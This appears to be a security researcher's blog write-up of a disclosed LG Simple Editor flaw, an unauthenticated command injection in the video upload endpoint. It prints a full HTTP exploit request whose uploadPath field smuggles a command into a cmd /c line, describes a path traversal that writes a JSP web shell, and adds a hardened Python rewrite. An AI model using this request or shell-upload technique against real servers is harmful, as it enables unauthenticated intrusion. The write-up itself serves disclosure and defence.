LG is a company that specialises in LED products and has a number of software products under its brand; this time we look at LG Simple Editor, disclosed by ZDI. There are not many instances on the public internet, but the vulnerability is an unauthenticated RCE.
https://www.zerodayinitiative.com/advisories/ZDI-23-1208/
`com.lge.simpleeditor.content.controller.ImageManagerRestController#uploadVideo`
The vulnerability is simple.
`com.lge.simpleeditor.content.service.CanvasServiceImpl#readVideoInfo` performs string concatenation:
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/58a8c67f-5be1-6971-137e-8751f35724b7.png)
The final cmd string, built by concatenating filePath, is:

```bat
MediaInfo --Inform=General;%Duration% -f "C:/LG Simple Editor/server/webapps/simpleeditor/sessions/1.mp4" > "C:/LG Simple Editor/server/webapps/simpleeditor/sessions/1.mp4.ini"
```
The path is wrapped in double quotes and then launched with cmd /c:
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/d7117f31-74ac-1157-fa13-ca78c6d4a46f.png)
So all that is needed is to break out of the double quotes inside the cmd variable.
Closing the double quote directly produced an error:
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/5704c91b-5056-2d56-8c54-b5a9e6b06d37.png)
Then I remembered that Windows does not allow special characters in folder/file names, so I changed it to \"/../ : closing the double quote this way and then using ../ to move up a directory level, the error no longer appears.
The constructed request is as follows:

```http
POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1
Host: 172.16.1.179:8080
Content-Length: 770
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyb6VMLBDGWBAjiJA
Origin: http://172.16.1.179:8080
Referer: http://172.16.1.179:8080/simpleeditor/index.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6
Connection: close
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile"; filename="1.mp4"
Content-Type: video/mp4
1
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadPath"
/sessions\"&ping localhost -nc 1&\..\..\..\
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_x"
-1000
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_y"
-1000
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_width"
1064
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_height"
599
------WebKitFormBoundaryyb6VMLBDGWBAjiJA--
```
The injected command is as follows:
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/41d16569-f7da-7486-b886-e61ab5898934.png)
It pops up:
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/5fb00690-9499-e8db-e1fe-b24bc36f7a54.png)
Looking carefully at the functionality, I found that arbitrary file upload across directories is also possible.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/2bf7f6cc-7ce6-b466-b8fc-a61146c84b29.png)
The file path is determined by originalFilePath at mark 1, which in turn depends on the uploadPath and fileName variables at mark 2. uploadPath is taken from the HTTP request at mark 4 and allows directory traversal, while for fileName, at mark 3, the extension is only checked if the file name contains a '.'. So uploadPath can be set to /js/1. and fileName given simply as a jsp name, which concatenates into an originalFilePath of /js/1.jsp.
That way a jsp shell can be written.
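A hardened version of the two code paths discussed above (the readVideoInfo command line and the uploadPath/fileName assembly), written here as an added defensive example in Python rather than the product's Java; it is not the vendor's code. The webapp base directory, the allow-listed extensions and the MediaInfo argument vector are assumptions.

```python
import ntpath
import re
import subprocess

# Constructed base directory: the webapp root that uploadPath is appended to (assumption).
WEBAPP_DIR = ntpath.normpath("C:/LG Simple Editor/server/webapps/simpleeditor")

# One plain path segment: no '.', '..', quotes, separators, '&' or spaces (assumed allow-list).
PLAIN_SEGMENT = re.compile(r"[A-Za-z0-9_-]{1,64}")
# A file name with an allow-listed video extension; checked whether or not a dot is present.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(?:mp4|mov|avi)")


def resolve_upload(upload_path, file_name):
    """Return the canonical destination below WEBAPP_DIR, or None to reject the request.

    Closes both weaknesses from the write-up: fileName is always validated (so a dot-less
    name such as 'jsp' cannot skip the extension check) and every segment of uploadPath must
    be a plain name, so '\\"&...&\\..\\..\\' and '/js/1.' are refused before any joining.
    """
    if SAFE_NAME.fullmatch(file_name) is None:
        return None
    segments = [s for s in re.split(r"[\\/]+", upload_path) if s != ""]
    if not all(PLAIN_SEGMENT.fullmatch(s) for s in segments):
        return None
    target = ntpath.normpath(ntpath.join(WEBAPP_DIR, *segments, file_name))
    # Defence in depth: the normalized path must still sit strictly inside the base directory.
    if not target.startswith(WEBAPP_DIR + ntpath.sep):
        return None
    return target


def mediainfo_argv(video_path):
    """Argument vector for the duration probe. Each element is one argv entry, so a path
    containing \\" or & is plain data: there is no cmd /c and no quoting to escape from."""
    return ["MediaInfo", "--Inform=General;%Duration%", "-f", video_path]


def write_duration(video_path):
    """Run the probe without a shell and write <video>.ini by redirecting stdout in Python,
    replacing the '> file.ini' that the original command string handed to cmd.exe."""
    with open(video_path + ".ini", "w") as ini:
        return subprocess.run(mediainfo_argv(video_path), stdout=ini, check=False).returncode
```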
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/0bf27705-9ed6-aa02-dd49-fce1e7e08aa0.png)
As shown:
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/fcf67ed6-b705-4e15-cd10-ea8a92772eea.png)
The shell path is at
ZDI disclosed a whole batch of holes in this product; looking through them, they are all simple ones, so there is no need to write them up.
The writing is poor, the wording flippant, the content shallow and the operation clumsy. Pointers and corrections from the masters are welcome; many thanks.